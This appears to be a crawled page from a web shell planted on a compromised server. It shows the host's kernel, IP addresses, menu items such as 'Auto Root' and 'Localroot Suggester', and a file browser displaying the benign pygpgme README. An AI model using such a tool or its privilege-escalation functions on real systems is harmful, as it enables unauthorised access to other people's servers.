Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.144.95.186
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
pygpgme-0.3 /
Delete
Unzip
Name
Size
Permission
Date
Action
examples
[ DIR ]
drwxr-xr-x
2021-11-01 09:21
tests
[ DIR ]
drwxr-xr-x
2021-11-01 09:21
PKG-INFO
889
B
-rw-r--r--
2012-03-08 11:55
README
1.2
KB
-rw-r--r--
2006-05-12 05:17
Save
Rename
A Python binding for the gpgme library, used to drive the gpg command line program. More information about gpgme can be found here: http://www.gnupg.org/(en)/related_software/gpgme/index.html This binding stays fairly close to the C API with the following exceptions: * Memory management is not exposed to the user * Functions like gpgme_get_foo()/gpgme_set_foo() are converted to attribute access on gpgme.Context objects. * Functions that take gpgme_data_t arguments take arbitrary Python file-like objects. The read(), write(), seek() and tell() methods may be used on the object. * Non-zero gpgme_error_t return values are converted to gpgme.error exceptions. * Only the synchronous versions of functions have been wrapped. However, the Python global interpreter lock is dropped, so should play nicely in multi-threaded Python programs. * Function pairs like gpgme_op_import()/gpgme_op_import_result() are combined into single method calls. * The Python version of gpgme_op_keylist() returns an iterator over the matched keys, rather than requiring the user to use a special iteration function. This library is licensed under the LGPL, the same license as the gpgme library.